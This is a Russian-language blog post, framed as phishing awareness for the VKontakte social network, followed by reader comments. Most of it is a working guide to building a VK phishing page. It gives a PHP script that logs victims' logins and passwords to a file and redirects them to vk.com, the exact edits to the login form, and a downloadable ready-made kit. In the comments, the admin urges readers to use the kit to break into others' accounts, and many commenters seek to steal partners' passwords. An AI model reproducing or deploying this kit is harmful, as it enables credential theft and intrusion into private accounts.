Как не попасться на фишинговый сайт?

мужчина ловит удочкой письмо

 

В этой статье я расскажу, что такое фишинг вконтакте. Как не попасться на фишинговый сайт, и не спалить свои учетные данные. Также приведу пример создания такого сайта.

Что такое фишинг?

Вообще слово fishing переводится как рыбалка. Фишинг - это подмена какого-либо сайта, на котором пользователи вводят учетные данные, такие как «логин» и «пароль», после чего перенаправляются на официальный сайт, чтобы не было подозрений. А нехороший человек «редиска» узнает ваши учетные данные, и может входить под вашим логином на сайт.

Будьте внимательными

Как вам могут подсунуть такой сайт, есть пару примеров.

  1. На любом ресурсе может быть ссылка, в которой говорится: "добавь меня в друзья и получи за это 10 голосов вконтакте". Согласитесь, заманчиво? Жертва переходит по этой ссылке, попадает на сайт вроде бы ничем не отличающийся от сайта вконтакте, вводит «логин» и «пароль». Попадает себе на страничку, голосов не прибавилось. Долго думает и в итоге забивает на это дело, а данные от учетной записи уже у «редиски».
  2. Ваша девушка или парень, дает вам ссылку на сайт, с предлогом лайкни Кота =) Вы без задней мысли переходите по ссылке, вводите «логин» и «пароль». И ваша вторая половинка теперь знает ваши учетные данные, и сможет посмотреть с кем это вы там переписываетесь =)

И еще куча вариантов, как можно заманить жертву на такой вот сайт.

Смотрите куда вы переходите, если вы сидите в данный момент в контакте и вам дают ссылку, вы по ней переходите, видите страницу авторизации, у вас сразу же должно закрасться подозрение. Обратите внимание на адрес сайта. Допустим вконтакте, адрес его: vk.com или vkontakte.ru. Не многие могут запомнить длинные доменные имена сайтов, их легче всего подделать. Я думаю из-за этого социальная сеть вконтакте, перешла на столь короткий доменный адрес, чтобы его было труднее подделать. Если вы увидите адрес vk.org то вы особо и не увидите подвоха, если после него чего-нибудь написать, например: http://vk.org/sveta27/albums4/123091239dfadf.jpg так вообще адрес как адрес. Ну так вот, если вас где-то просят ввести пароль, проверяйте внимательно доменный адрес.

Создание фишинг сайта

Данный материал приводится сугубо для ознакомления, а не для ломания учетных записей своих знакомых и друзей, также помните, что это уголовное дело.

И так приведу пример создания фишингового сайта для социальной сети вконтакте.

Открываем любой браузер, заходим по адресу vk.com,

адресная строка вашего браузера

жмем файл => сохранить как =>

рабочий стол вашего компьютера

Имя файла: index.html

Тип файла: Веб – страница, полность, с картинками. Жмем кнопку, Сохранить.

Теперь нужно создать скрипт, который будет передавать данные введенные в поле логин и пароль. Назовем его icq.php

Открываем блокнот и вставляем туда этот код.

<?

$Login = $_POST[zabor]; // Логин  жертвы

$Pass = $_POST['zena']; // Пароль жертвы

$log = fopen("ups.php","a+"); //тут будут лежать пароли жертв

fwrite($log,"<br> $Login:$Pass \n"); //производим запись в ups.php

fclose($log); //закрывает ups.php

echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://vkontakte.ru'></head></html>"; // перенаправляем жертву на http://vk.com

?>

Закрываем и сохраняем как icq.php

Открываем в блокноте файл, index.html. Открываем поиск и вводим <form жмем enter.

Он найдет строчку:

<FORM name="login" id="quick_login_form" onsubmit="if (vklogin) {return true} else {quick_login();return false;}" action="https://login.vk.com/?act=login" method="POST">

Меняем её на это:

<FORM name="login" id="quick_login_form" onsubmit="if (vklogin) {return true} else {quick_login();return false;}" action="icq.php" method="POST">

Дальше, смотрим чуть ниже и находим строчку:

<INPUT name="email" id="quick_email" onfocus="show'quick_expire')" type="text">

Меняем на это:

<INPUT name="zabor" id="quick_email" onfocus="show('quick_expire')"type="text">

Смотрим еще чуть ниже и находим строчку:

<INPUT name="pass" id="quick_pass" onfocus="show('quick_expire')"type="password">

Меняем на это:

<INPUT name="zena" id="quick_pass" onfocus="show('quick_expire')"type="password">

Дальше необходимо кнопку «Войти» включить в форму, чтобы она работала, для этого, находим чуть ниже закрывающийся тег </form>, вырезаем его и вставляем его вот тут.

<DIV class="button_blue button_wide"><BUTTON id="quick_login_button">Войти</BUTTON></form></DIV>

Сохраняем index.html, и у вас в итоге получилось два файла файла и одна папка. Дальше все это дело нужно будет залить на ваш хостинг. Я думаю, вы умеете это делать, если нет, задайте вопрос в комментариях.

Когда жертва зайдет на вашу страничку фишинговую, введет «логин» и «пароль», у вас создатся на хостинге еще один файл, ups.php в нем и будут храниться учетные записи.

Вывод

В этой статье вы узнали, как себя обезопасить и не попасться на фишинговый сайт. Как создать фишинговый сайт. Скачать готовый, фишинг для вконтакта, можно ниже, для ознакомительных целей. Посмотреть пример можно по этой ссылке, введите там не верные учетные данные, затем по этой ссылке вы увидите свои учетные данные, которые вы ввели.

Скачать готовый фишинговый сайт для вконтакте.

          Скачать ( Количество скачиваний: 2187 )

Фишинг атаки как не попасть в ловушку

Комментарии

  1. Виктория

    да, оказывается просто создать фишинговый сайт, если чуть знаешь PHP и умеешь открывать файл html в Блокноте ! СПасибо за предупреждение, теперь буду всегда смотреть на какие страницы перехожу, чтобы не отдать свои логин и пароль «редиске»!

  2. Людмила Винокурова

    Да, уж этот фишинг! Когда только начала свою деятельность в Интернет — попалась на удочку этих «редисок».
    Зато на своём опыте прошла. Теперь знаю что это такое.
    А вот как создать такой фишинговый сайт (в целях ознакомления,конечно) почитала с удовольствием. Теперь знаю и это.

    У меня к Вам просьба — напишите здесь или у меня на блоге Ваше
    имя (ведь feniksdv- это ник, как я понимаю). Это мне нужно для того, что через несколько дней моему блогу будет 1 мес., я буду писать статью-отчёт и хочу Вас упомянуть как лучшего ТОП- комментатора.

    • admin

      О приятно слышать :) В сайдбаре есть «МЫ В СОЦИАЛЬНЫХ СЕТЯХ», вот там есть кнопки facebook и vkontakte, там про меня все написано :)

    • Имя

      Ха, секрет нашел, раньше эти сайты под webmoney.ru косили- вот что опасно, а не вконтакте, где одни дети сидят!

  3. Ремзи

    Я об этом даже и не знал. Думал, что бы взломать чью то страничку програмисты сидят часами и подбирают пароли как в кино.А это оказывается так легко.

  4. alf2012

    Учитывая, что значительная часть аудитории вконтакте до 18, думаю эта инструкция будет использоваться не раз и совсем не в ознакомительных целях:)))

  5. Дмитрий

    Теперь еще больше школьников будут клепать фишинговые сайты.
    Хотя теперь люди стали чуть-чуть осмотрительнее, и чтобы взломать страничку, нужно больше усилий.

    • Никита

      А что сложного, поставил в школе стартовую страницу и делать ничего не надо.

  6. александр

    <?
    $Login = $_POST[zabor]; // Логин жертвы
    $Pass = $_POST['zena']; // Пароль жертвы
    $log = fopen("ups.php","a+"); //тут будут лежать пароли жертв
    fwrite($log," $Login:$Pass \n»); //производим запись в ups.php
    fclose($log); //закрывает ups.php
    echo «»; // перенаправляем жертву на http://vk.com
    ?> напиши по подробнее с примером что куда писать немогу разобраться,черкни в личку я в крнтакте ид 153058044 заранее спс

    • admin

      а что поподробнее написать? и где разобраться не можешь? тут же архив лежит прикрепленный, качай да используй, там уже все настроено.

    • Алина

      нужно создать фейк вконтакте. хочу узнать пароль своего МЧ!
      как это можно сделать? напишите мне на почту! ЗАПЛАЧУ!

    • Admin

      Закинуть в корень папки вашего хостинга все фалы. Как это сделать можно спросить у тех поддержки вашего хостинга, обычно делается с помощью фтп.

  7. Анастасия

    Люди, подскажите, я не совсем поняла, как создать этот фишинговый сайт.

  8. Айка

    Прошу очень,помогите с сайтом! я обязательно заплачу! мой эл. адрес [email protected] Cпасибо, буду ждать!

  9. Мария

    можете взломать контакт? я знаю логин в контакте мне нужен пароль! так же знаю номер телефона, е-меил логин без пароля! сколько будет это стоить?

    • Admin

      Извините ломанием чужих аккаунтов не занимаемся, это незаконно! Но Вы можете сделать это сами с помощью фейкового сайта вконтакте. (по инструкции)

      • Владимир

        cделал фейк одноклассников а когда заливаю на хост его сразу глушат ! как они определяют ? ведь он даже еще не работал ! пользуюсь хостом на хостингере ! месяц назад было нормально а теперь не получаеться ! как они палят ?

  10. Жора

    как сделать так что бы логин и пароль перенаправлялись в то место куда я укажу.. Ну то есть я у себя в браузерена (на компе) поставлю эту фишинг страничку вместо нормальной.. мой знакомый попытаеться авторизоваться черз эту страничку а тут бац и его лог и пароль сохраняяться в каком нибудь файле! а я потом погляжу и зайду с его акка! так можно? что б там без хостингов всяких..)) спасибо!

  11. Эндру

    Не могу понять почему index.htm не хочет сохраняться у меня на сервере, высвечивается вот такая ошибка Ошибка: Не удалось сохранить файл ‘/home/hikkimori/data/tmp/filemgr.reiElf/index.htm’

    • Admin

      filemgr.reiElf — это помой-му не папка, а файл!
      Если это название все же папки, то возможно, что нет разрешение на запись в этот каталог.

  12. alex

    напиши на почту по поводу фишинга вк , заплачу
    [email protected]

  13. Сергей

    у вас не работает функция регистрации. Нужна помощь с доступом к паролю вопросы лично задам скайп internanional

  14. Иван

    Не смог разобраться с заливом файлов на хостинг. Очень бы хотелось увидеть видео-руководство. Спасибо!

  15. Лёха

    подскажыте пожалуста! залил я всё на хостинг, что дале мне делать с етими фалами?
    Залил всё что скачал (готовый фишинговый сайт для вконтакте)

  16. Salomeya

    C кодировочками проблемы в вашем примере, все в символах открывается.

  17. Виктор

    Здравствуйте. Вроде бы я все понял что и как… Но вот не пойму одного… Если писать все эти тэги, то писать их > $Login = $_POST[zabor]; // Логин жертвы

    $Pass = $_POST['zena']; // Пароль жертвы, < слова логин жертвы, пароль жертвы, их писать надо? И еще вопрос, посоветуйте пожалуйста какой нибудь редактор для андройда, ну типо webmasterLite, для написания этих кодов. Заранее спс

  18. Юля

    Как залить файл на хостинг,и вообще объясните мне,вот я скачала готовый фишинг для вконтакте,и что мне делать?Скачать хостинг?В общем объясните мне,пожалуйста,все.

  19. федя

    Сделал фейковую вконтакте страницу и вот нажимаешь кнопку ВОЙТИ, а логин и пароль даже не введены, все равно переадресовывает на vk.com/ . Как сделать так что бы пока не будет введены логин и пароль юзер будет оставатся на фейковой странице?????

  20. Greg

    Когда надо менять строчки в файле index.html в блокноте, то вместо указанных строк теперь все совсем по другому написанно т.к. вконтакте все время меняют вечно что то. Вопрос такой, куда и что нужно теперь менять и копировать ?

  21. Катя

    код страницы вконтакте видимо немного изменен, не могу найти что надо поменять, помоги пожалуйста с сайтом, заплачу)

  22. Eliza

    А файл index.html его откуда взять? в образовавшейся папке от сохраненной страницы вк? там есть два файла индекс, только ни в оном из них не находит слово <form

  23. Eliza

    почему то не отправляются пароль и логин в файл icq, и перенаправляет на страницу которая без доступа. в чем проблема?

  24. Аноним

    Админ у меня например есть свой сайт на cms dle хочется форму поставить авторизации при вводе происходит кража пароля с сохранением в файл, и человек авториззуется на моем сайте — цена вопроса?

  25. Санька

    Создайте поже фишинг вк через бесплатный хостинг, зарание спасибо.

  26. Жан

    Админ, а че архив то удалён? И еще:
    NPUT name=»email» id=»quick_email» onfocus=»show’quick_expire’)» type=»text» — нет там такой строки.

  27. tennfive

    Админ, возможно ли прилатать к фишсайту скрипт, который проверяет правильность логина и пароля?
    Я спрашиваю исключительно в целях безопасности

Оставить комментарий

Можно использовать следующие HTML тэги:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong> <pre prompt="" escaped="">